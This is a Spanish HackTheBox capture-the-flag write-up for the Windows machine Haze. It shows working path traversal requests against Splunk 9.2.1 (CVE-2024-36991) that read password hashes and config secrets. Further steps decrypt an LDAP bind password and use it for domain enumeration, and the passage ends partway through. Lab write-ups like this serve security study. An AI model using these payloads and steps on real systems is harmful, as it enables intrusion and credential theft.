This page looks best with JavaScript enabled

HackTheBox - Haze

 •  ✍️ sckull
featured image

En Haze se realizo la explotacion de Path Traversal en Splunk Enterprise donde se realizo la lectura de archivos para obtener un par de credenciales. Con estas, se realizo la enumeracion de usuarios y posteriormente la explotacion de distintos permisos en Active Directory y, acceso addicional. Un backup de Splunk permitio el acceso al dashboard y a traves de la instalacion de scripts acceso a un nuevo usuario dentro de la maquina. Finalmente escalamos privilegios mediante SeImpersonatePrivilege.

Nombre Haze box_img_maker
OS

Windows

Puntos 40
Dificultad Hard
Fecha de Salida 2025-03-29
IP 10.10.11.61
Maker

EmSec

Rated 
{
    "type": "bar",
    "data":  {
        "labels": ["Cake", "VeryEasy", "Easy", "TooEasy", "Medium", "BitHard","Hard","TooHard","ExHard","BrainFuck"],
        "datasets": [{
            "label": "User Rated Difficulty",
            "data": [29, 23, 85, 158, 239, 294, 528, 290, 96, 71],
            "backgroundColor": ["#9fef00","#9fef00","#9fef00", "#ffaf00","#ffaf00","#ffaf00","#ffaf00", "#ff3e3e","#ff3e3e","#ff3e3e"]
        }]
    },
    "options": {
        "scales": {
          "xAxes": [{"display": false}],
          "yAxes": [{"display": false}]
        },
        "legend": {"labels": {"fontColor": "white"}},
        "responsive": true
      }
}

Recon

nmap

nmap muestra multiples puertos abiertos: DNS (53), Kerberos (88), RPC (135), SMB (139, 445), LDAP/s (389, 636, 3268, 3269), HTTP (8000), HTTPS (8088, 8089).

  1
  2
  3
  4
  5
  6
  7
  8
  9
 10
 11
 12
 13
 14
 15
 16
 17
 18
 19
 20
 21
 22
 23
 24
 25
 26
 27
 28
 29
 30
 31
 32
 33
 34
 35
 36
 37
 38
 39
 40
 41
 42
 43
 44
 45
 46
 47
 48
 49
 50
 51
 52
 53
 54
 55
 56
 57
 58
 59
 60
 61
 62
 63
 64
 65
 66
 67
 68
 69
 70
 71
 72
 73
 74
 75
 76
 77
 78
 79
 80
 81
 82
 83
 84
 85
 86
 87
 88
 89
 90
 91
 92
 93
 94
 95
 96
 97
 98
 99
100
101

# Nmap 7.95 scan initiated Wed Apr  2 02:37:55 2025 as: /usr/lib/nmap/nmap --privileged -p53,88,135,139,389,445,464,593,636,3268,3269,5985,8000,8088,8089,9389,47001,49664,49665,49666,49667,49668,51573,54762,54764,54768,54783,54794,54814,54968 -sV -sC -oN nmap_scan 10.10.11.61
Nmap scan report for 10.10.11.61
Host is up (0.21s latency).

PORT      STATE SERVICE       VERSION
53/tcp    open  domain        (generic dns response: SERVFAIL)
| fingerprint-strings: 
|   DNS-SD-TCP: 
|     _services
|     _dns-sd
|     _udp
|_    local
88/tcp    open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-04-02 07:51:22Z)
135/tcp   open  msrpc         Microsoft Windows RPC
139/tcp   open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp   open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
445/tcp   open  microsoft-ds?
464/tcp   open  kpasswd5?
593/tcp   open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3268/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
|_ssl-date: TLS randomness does not represent time
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
3269/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: haze.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc01.haze.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:dc01.haze.htb
| Not valid before: 2025-03-05T07:12:20
|_Not valid after:  2026-03-05T07:12:20
|_ssl-date: TLS randomness does not represent time
5985/tcp  open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
8000/tcp  open  http          Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
| http-title: Site doesn't have a title (text/html; charset=UTF-8).
|_Requested resource was http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
|_http-server-header: Splunkd
8088/tcp  open  ssl/http      Splunkd httpd
|_http-server-header: Splunkd
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
|_http-title: 404 Not Found
8089/tcp  open  ssl/http      Splunkd httpd
| http-robots.txt: 1 disallowed entry 
|_/
| ssl-cert: Subject: commonName=SplunkServerDefaultCert/organizationName=SplunkUser
| Not valid before: 2025-03-05T07:29:08
|_Not valid after:  2028-03-04T07:29:08
|_http-server-header: Splunkd
|_http-title: splunkd
9389/tcp  open  mc-nmf        .NET Message Framing
47001/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49664/tcp open  msrpc         Microsoft Windows RPC
49665/tcp open  msrpc         Microsoft Windows RPC
49666/tcp open  msrpc         Microsoft Windows RPC
49667/tcp open  msrpc         Microsoft Windows RPC
49668/tcp open  msrpc         Microsoft Windows RPC
51573/tcp open  msrpc         Microsoft Windows RPC
54762/tcp open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
54764/tcp open  msrpc         Microsoft Windows RPC
54768/tcp open  msrpc         Microsoft Windows RPC
54783/tcp open  msrpc         Microsoft Windows RPC
54794/tcp open  msrpc         Microsoft Windows RPC
54814/tcp open  msrpc         Microsoft Windows RPC
54968/tcp open  msrpc         Microsoft Windows RPC
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.95%I=7%D=4/2%Time=67ECDB5A%P=x86_64-pc-linux-gnu%r(DNS-S
SF:D-TCP,30,"\0\.\0\0\x80\x82\0\x01\0\0\0\0\0\0\t_services\x07_dns-sd\x04_
SF:udp\x05local\0\0\x0c\0\x01");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: 1h13m24s
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
| smb2-time: 
|   date: 2025-04-02T07:52:29
|_  start_date: N/A

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Wed Apr  2 02:39:20 2025 -- 1 IP address (1 host up) scanned in 84.09 seconds

SMB & RPC

Tanto el servicio samba como RPC no muestran informacion con sesiones nulas.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11

❯ netexec smb 10.10.11.61 -u "" -p "" --shares
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.61     445    DC01             [+] haze.htb\: 
SMB         10.10.11.61     445    DC01             [-] Error enumerating shares: STATUS_ACCESS_DENIED
❯ rpcclient -N -U "" 10.10.11.61
rpcclient $> enumdomusers
result was NT_STATUS_ACCESS_DENIED
rpcclient $> enumdomgroups
result was NT_STATUS_ACCESS_DENIED
rpcclient $> exit

Splunk

Los headers del sitio en el puerto 8000 muestran Splunk como servidor.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26

❯ curl -sI 10.10.11.61:8000
HTTP/1.1 303 See Other
Date: Wed, 09 Apr 2025 06:50:23 GMT
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Content-Length: 335
Location: http://10.10.11.61:8000/en-US/
Vary: Accept-Language
Connection: Keep-Alive
X-Frame-Options: SAMEORIGIN
Server: Splunkd

❯ curl -sI http://10.10.11.61:8000/en-US/
HTTP/1.1 303 See Other
Date: Wed, 09 Apr 2025 06:50:33 GMT
Content-Type: text/html;charset=utf-8
X-Content-Type-Options: nosniff
Content-Length: 176
Vary: Accept-Encoding, Cookie
Connection: Keep-Alive
X-Frame-Options: SAMEORIGIN
Location: http://10.10.11.61:8000/en-US/account/login?return_to=%2Fen-US%2F
Set-Cookie: session_id_8000=b49feb42d404aa1d4c36a6ab188d3460722703f7; expires=Wed, 09 Apr 2025 07:50:33 GMT; HttpOnly; Max-Age=3600; Path=/
Server: Splunkd

Tras visitar el sitio observamos un login para Splunk Enterprise.

image

El puerto 8089 pertenece a los componentes de Splunk en este observamos la version 9.2.1.

image

Path Traversal - Splunk

Una vulnerabilidad Path Traversal afecta a versiones =< 9.2.2, 9.1.5 y 9.0.10 (Critical Splunk Vulnerability CVE-2024-36991). La version 9.2.1 es afectada, realizamos la solicitud de la explotacion al archivo /etc/passwd y observamos en la respuesta el contenido, este muestra cuatro usuarios con su respectivo hash de contrasena.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27

GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/passwd HTTP/1.1
Host: 10.10.11.61:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://10.10.11.61:8000/
Connection: keep-alive
Cookie: session_id_8000=97719c9a018fc572ff5abf88daa5d0451fa29197; splunkweb_uid=C56627AA-8215-4AE4-A7C0-5DC296FE1D5E
If-None-Match: "f2b3290b13bf107a57f507819addbe3f929e9fff"

HTTP/1.1 200 OK
Date: Wed, 02 Apr 2025 08:15:06 GMT
Content-Type: text/html
X-Content-Type-Options: nosniff
Last-Modified: Wed, 05 Mar 2025 07:40:47 GMT
Content-Length: 609
Vary: Accept-Encoding, Cookie
Connection: Keep-Alive
Accept-Ranges: bytes
Set-Cookie: session_id_8000=ad91ad4f1a9227e86c869a92d042c3079b359d4c; expires=Wed, 02 Apr 2025 09:15:06 GMT; HttpOnly; Max-Age=3600; Path=/
Server: Splunkd

:admin:$6$Ak3m7.aHgb/NOQez$O7C8Ck2lg5RaXJs9FrwPr7xbJBJxMCpqIx3TG30Pvl7JSvv0pn3vtYnt8qF4WhL7hBZygwemqn7PBj5dLBm0D1::Administrator:admin:changeme@example.com:::20152
:edward:$6$3LQHFzfmlpMgxY57$Sk32K6eknpAtcT23h6igJRuM1eCe7WAfygm103cQ22/Niwp1pTCKzc0Ok1qhV25UsoUN4t7HYfoGDb4ZCv8pw1::Edward@haze.htb:user:Edward@haze.htb:::20152
:mark:$6$j4QsAJiV8mLg/bhA$Oa/l2cgCXF8Ux7xIaDe3dMW6.Qfobo0PtztrVMHZgdGa1j8423jUvMqYuqjZa/LPd.xryUwe699/8SgNC6v2H/:::user:Mark@haze.htb:::20152
:paul:$6$Y5ds8NjDLd7SzOTW$Zg/WOJxk38KtI.ci9RFl87hhWSawfpT6X.woxTvB4rduL4rDKkE.psK7eXm6TgriABAhqdCPI4P0hcB8xz0cd1:::user:paul@haze.htb:::20152

Hashcat

Intentamos realizar un crackeo a los hashes pero estos no se encontraban en el wordlist de rockyou.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

PS C:\Users\sckull\Documents\hashcat-6.2.6> .\hashcat.exe -m 1800 ..\hash\splunk_hash_haze rockyou.txt
hashcat (v6.2.6) starting

[..]

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 281 MB

Dictionary cache hit:
* Filename..: rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

Cracking performance lower than expected?

[..]

[s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>

Approaching final keyspace - workload adjusted.

Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1800 (sha512crypt $6$, SHA512 (Unix))
Hash.Target......: ..\hash\splunk_hash_haze
Time.Started.....: Tue Apr 01 18:44:01 2025 (9 mins, 43 secs)
Time.Estimated...: Tue Apr 01 18:53:44 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:    98459 H/s (0.95ms) @ Accel:1024 Loops:64 Thr:64 Vec:1
Recovered........: 0/4 (0.00%) Digests (total), 0/4 (0.00%) Digests (new), 0/4 (0.00%) Salts
Progress.........: 57377540/57377540 (100.00%)
Rejected.........: 0/57377540 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:3 Amplifier:0-1 Iteration:4992-5000
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[2151617a40577378] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Temp: 53c Fan: 56% Util: 91% Core:2760MHz Mem:8251MHz Bus:8

Started: Tue Apr 01 18:43:49 2025
Stopped: Tue Apr 01 18:53:45 2025
PS C:\Users\sckull\Documents\hashcat-6.2.6>

Kerbrute

Creamos un wordlist con los usarios encontrados y ejecutamos kerbrute sobre este, unicamente muestra al usuario Administrator como valido.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

❯ /opt/bin/kerbrute userenum -d haze.htb --dc dc01.haze.htb user.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/02/25 - Ronnie Flathers @ropnop

2025/04/02 08:16:26 >  Using KDC(s):
2025/04/02 08:16:26 >  	dc01.haze.htb:88

2025/04/02 08:16:26 >  [+] VALID USERNAME:	Administrator@haze.htb
2025/04/02 08:16:26 >  Done! Tested 8 usernames (1 valid) in 0.244 seconds

Splunk Secrets

Splunk contiene multiples archivos de configuracion entre ellos authentication.conf. Al realizar la solicitud de este archivo encontramos la autenticacion por LDAP, se muestra un nombre en bindDN y el valor de bindDNpassword que parece ser una contrasena.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45

GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/system/local/authentication.conf HTTP/1.1
Host: 10.10.11.61:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://10.10.11.61:8000/
Connection: keep-alive
Cookie: session_id_8000=97719c9a018fc572ff5abf88daa5d0451fa29197; splunkweb_uid=C56627AA-8215-4AE4-A7C0-5DC296FE1D5E
If-None-Match: "f2b3290b13bf107a57f507819addbe3f929e9fff"


[splunk_auth]
minPasswordLength = 8
minPasswordUppercase = 0
minPasswordLowercase = 0
minPasswordSpecial = 0
minPasswordDigit = 0

[Haze LDAP Auth]
SSLEnabled = 0
anonymous_referrals = 1
bindDN = CN=Paul Taylor,CN=Users,DC=haze,DC=htb
bindDNpassword = $7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY=
charset = utf8
emailAttribute = mail
enableRangeRetrieval = 0
groupBaseDN = CN=Splunk_LDAP_Auth,CN=Users,DC=haze,DC=htb
groupMappingAttribute = dn
groupMemberAttribute = member
groupNameAttribute = cn
host = dc01.haze.htb
nestedGroups = 0
network_timeout = 20
pagelimit = -1
port = 389
realNameAttribute = cn
sizelimit = 1000
timelimit = 15
userBaseDN = CN=Users,DC=haze,DC=htb
userNameAttribute = samaccountname

[authentication]
authSettings = Haze LDAP Auth
authType = LDAP

Una respuesta en el foro de splunk indica que el valor de bindDNpassword es posible ‘revertirlo’ conociendo el valor del archivo splunk.secret este ultimo lo encontramos en /etc/auth/splunk.secret.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25

GET /en-US/modules/messaging/C:../C:../C:../C:../C:../etc/auth/splunk.secret HTTP/1.1
Host: 10.10.11.61:8000
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: http://10.10.11.61:8000/
Connection: keep-alive
Cookie: session_id_8000=97719c9a018fc572ff5abf88daa5d0451fa29197; splunkweb_uid=C56627AA-8215-4AE4-A7C0-5DC296FE1D5E
If-None-Match: "f2b3290b13bf107a57f507819addbe3f929e9fff"


HTTP/1.1 200 OK
Date: Wed, 02 Apr 2025 08:38:34 GMT
Content-Type: text/html
X-Content-Type-Options: nosniff
Last-Modified: Wed, 05 Mar 2025 07:29:08 GMT
Content-Length: 254
Vary: Accept-Encoding, Cookie
Connection: Keep-Alive
Accept-Ranges: bytes
Set-Cookie: session_id_8000=de2c77673ebc5d0db0e1f3fa93a7889c7a098f00; expires=Wed, 02 Apr 2025 09:38:34 GMT; HttpOnly; Max-Age=3600; Path=/
Server: Splunkd

NfKeJCdFGKUQUqyQmnX/WM9xMn5uVF32qyiofYPHkEOGcpMsEN.lRPooJnBdEL5Gh2wm12jKEytQoxsAYA5mReU9.h0SYEwpFMDyyAuTqhnba9P2Kul0dyBizLpq6Nq5qiCTBK3UM516vzArIkZvWQLk3Bqm1YylhEfdUvaw1ngVqR1oRtg54qf4jG0X16hNDhXokoyvgb44lWcH33FrMXxMvzFKd5W3TaAUisO6rnN0xqB7cHbofaA1YV9vgD

Para obtener el valor de la contrasena utilizamos la herramienta splunksecrets.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18

# https://github.com/HurricaneLabs/splunksecrets
❯ splunksecrets --help
Usage: splunksecrets [OPTIONS] COMMAND [ARGS]...

Options:
  --help  Show this message and exit.

Commands:
  dbconnect-decrypt      Decrypt password used for dbconnect identity
  dbconnect-encrypt      Encrypt password used for dbconnect identity
  phantom-decrypt        Decrypt password used for Phantom asset
  phantom-encrypt        Encrypt password used for Phantom asset
  splunk-decrypt         Decrypt password using Splunk 7.2 algorithm
  splunk-encrypt         Encrypt password using Splunk 7.2 algorithm
  splunk-hash-passwd     Generate password hash for use in...
  splunk-legacy-decrypt  Decrypt password using legacy Splunk algorithm...
  splunk-legacy-encrypt  Encrypt password using legacy Splunk algorithm...

Ejecutamos la herramienta especificando el archivo secrets y el ‘cifrado’, observamos la contrasena texto plano.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

❯ splunksecrets splunk-decrypt --help
Usage: splunksecrets splunk-decrypt [OPTIONS]

  Decrypt password using Splunk 7.2 algorithm

Options:
  -S, --splunk-secret TEXT  [required]
  --ciphertext TEXT
  --help                    Show this message and exit.
❯ splunksecrets splunk-decrypt -S splunk.secrets --ciphertext '$7$ndnYiCPhf4lQgPhPu7Yz1pvGm66Nk0PpYcLN+qt1qyojg4QU+hKteemWQGUuTKDVlWbO8pY='
Ld@p_Auth_Sp1unk@2k24

User - paul.taylor

Ningun usuario conocido es compatible con la contrasena en Splunk o en algun servicio de la maquina. Con los usuarios conocidos y los DN encontrados generamos un wordlist de usuarios con el script usernames.py.

1
2
3
4

❯ python usernames.py user.txt > new_users.txt
❯ wc -l new_users.txt
80 new_users.txt

Ejecutamos kerbrute nuevamente y observamos que paul.taylor es valido.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16

❯ /opt/bin/kerbrute userenum -d haze.htb --dc dc01.haze.htb new_users.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/02/25 - Ronnie Flathers @ropnop

2025/04/02 07:13:48 >  Using KDC(s):
2025/04/02 07:13:48 >  	dc01.haze.htb:88

2025/04/02 07:13:48 >  [+] VALID USERNAME:	paul.taylor@haze.htb
2025/04/02 07:13:50 >  Done! Tested 80 usernames (1 valid) in 1.713 seconds

Se observa que el par contrasena y usuario son aceptados por samba y ldap.

1
2
3
4
5
6
7

❯ netexec ldap 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24'
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.61     389    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
❯ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24'
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24

Bloodhound

Se ejecuto bloodhound-ce el output muestra unicamente tres usuarios.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20

❯ python bloodhound.py -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' -d haze.htb -dc dc01.haze.htb -ns 10.10.11.61 -c all --zip
INFO: BloodHound.py for BloodHound Community Edition
INFO: Found AD domain: haze.htb
INFO: Getting TGT for user
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: dc01.haze.htb
INFO: Found 3 users
INFO: Found 32 groups
INFO: Found 2 gpos
INFO: Found 2 ous
INFO: Found 18 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: dc01.haze.htb
INFO: Done in 00M 41S
INFO: Compressing output into 20250402113722_bloodhound.zip

Ejecutamos bloodhound-ce y cargamos el archivo zip. Por alguna razon la informacion esta “incompleta” en algunos casos unicamente se muestra el SID del grupo/usuario como se observa al usuario Paul cuyo SID del grupo al que pertenece es de Domain Users.

Paul.Taylor

1
2
3

rpcclient $> lookupsids S-1-5-21-323145914-28650650-2368316563-513
S-1-5-21-323145914-28650650-2368316563-513 HAZE\Domain Users (2)
rpcclient $>

Este “problema” fue constante durante la resolucion de la maquina por lo que se ejecuto bloodhound por cada usuario al que se accedio. Es posible que cada usuario tenga restricciones o limitaciones sobre otros usuarios/grupos.

image

Haze-it-backup

Entre los usuarios que encontro bloodhound se muestra haze-it-backup.

1
2
3
4
5

❯ jq -r '.data[].Properties.name' 20250402113722_users.json
NT AUTHORITY@HAZE.HTB
HAZE-IT-BACKUP$@HAZE.HTB
PAUL.TAYLOR@HAZE.HTB

No se muestra algun grupo interesante para este usuario.

image

User - mark.adams

Users

Tras ejecutar netexec para enumerar usuarios se muestra unicamente un usuario.

1
2
3
4
5
6
7

❯ netexec ldap 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --users
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.61     389    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
LDAP        10.10.11.61     389    DC01             [*] Enumerated 1 domain users: haze.htb
LDAP        10.10.11.61     389    DC01             -Username-                    -Last PW Set-       -BadPW- -Description-                                               
LDAP        10.10.11.61     389    DC01             paul.taylor                   2025-04-09 09:16:39 0

Ejecutamos netexec con la flag --rid-brute, muestra grupos y usuarios mas de los que bloodhound encontro.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38

❯ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute
SMB         10.10.11.61     445    DC01             [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:haze.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.61     445    DC01             [+] haze.htb\paul.taylor:Ld@p_Auth_Sp1unk@2k24 
SMB         10.10.11.61     445    DC01             498: HAZE\Enterprise Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             500: HAZE\Administrator (SidTypeUser)
SMB         10.10.11.61     445    DC01             501: HAZE\Guest (SidTypeUser)
SMB         10.10.11.61     445    DC01             502: HAZE\krbtgt (SidTypeUser)
SMB         10.10.11.61     445    DC01             512: HAZE\Domain Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             513: HAZE\Domain Users (SidTypeGroup)
SMB         10.10.11.61     445    DC01             514: HAZE\Domain Guests (SidTypeGroup)
SMB         10.10.11.61     445    DC01             515: HAZE\Domain Computers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             516: HAZE\Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             517: HAZE\Cert Publishers (SidTypeAlias)
SMB         10.10.11.61     445    DC01             518: HAZE\Schema Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             519: HAZE\Enterprise Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             520: HAZE\Group Policy Creator Owners (SidTypeGroup)
SMB         10.10.11.61     445    DC01             521: HAZE\Read-only Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             522: HAZE\Cloneable Domain Controllers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             525: HAZE\Protected Users (SidTypeGroup)
SMB         10.10.11.61     445    DC01             526: HAZE\Key Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             527: HAZE\Enterprise Key Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             553: HAZE\RAS and IAS Servers (SidTypeAlias)
SMB         10.10.11.61     445    DC01             571: HAZE\Allowed RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.61     445    DC01             572: HAZE\Denied RODC Password Replication Group (SidTypeAlias)
SMB         10.10.11.61     445    DC01             1000: HAZE\DC01$ (SidTypeUser)
SMB         10.10.11.61     445    DC01             1101: HAZE\DnsAdmins (SidTypeAlias)
SMB         10.10.11.61     445    DC01             1102: HAZE\DnsUpdateProxy (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1103: HAZE\paul.taylor (SidTypeUser)
SMB         10.10.11.61     445    DC01             1104: HAZE\mark.adams (SidTypeUser)
SMB         10.10.11.61     445    DC01             1105: HAZE\edward.martin (SidTypeUser)
SMB         10.10.11.61     445    DC01             1106: HAZE\alexander.green (SidTypeUser)
SMB         10.10.11.61     445    DC01             1107: HAZE\gMSA_Managers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1108: HAZE\Splunk_Admins (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1109: HAZE\Backup_Reviewers (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1110: HAZE\Splunk_LDAP_Auth (SidTypeGroup)
SMB         10.10.11.61     445    DC01             1111: HAZE\Haze-IT-Backup$ (SidTypeUser)
SMB         10.10.11.61     445    DC01             1112: HAZE\Support_Services (SidTypeGroup)

Generamos un wordlist con los usuarios y verificamos con kerbrute, siete son validos.

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35

❯ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep SidTypeUser | cut -d '\' -f2 | cut -d ' ' -f1
Administrator
Guest
krbtgt
DC01$
paul.taylor
mark.adams
edward.martin
alexander.green
Haze-IT-Backup$
❯ netexec smb 10.10.11.61 -u paul.taylor -p 'Ld@p_Auth_Sp1unk@2k24' --rid-brute | grep SidTypeUser | cut -d '\' -f2 | cut -d ' ' -f1 > rusers.txt
❯ wc -l rusers.txt
9 rusers.txt
❯ /opt/bin/kerbrute userenum -d haze.htb --dc dc01.haze.htb rusers.txt

    __             __               __     
   / /_____  _____/ /_  _______  __/ /____ 
  / //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
 / ,< /  __/ /  / /_/ / /  / /_/ / /_/  __/
/_/|_|\___/_/  /_.___/_/   \__,_/\__/\___/                                        

Version: v1.0.3 (9dad6e1) - 04/02/25 - Ronnie Flathers @ropnop

2025/04/02 08:00:37 >  Using KDC(s):
2025/04/02 08:00:37 >  	dc01.haze.htb:88

2025/04/02 08:00:37 >  [+] VALID USERNAME:	Administrator@haze.htb
2025/04/02 08:00:37 >  [+] VALID USERNAME:	paul.taylor@haze.htb
2025/04/02 08:00:37 >  [+] VALID USERNAME:	DC01$@haze.htb
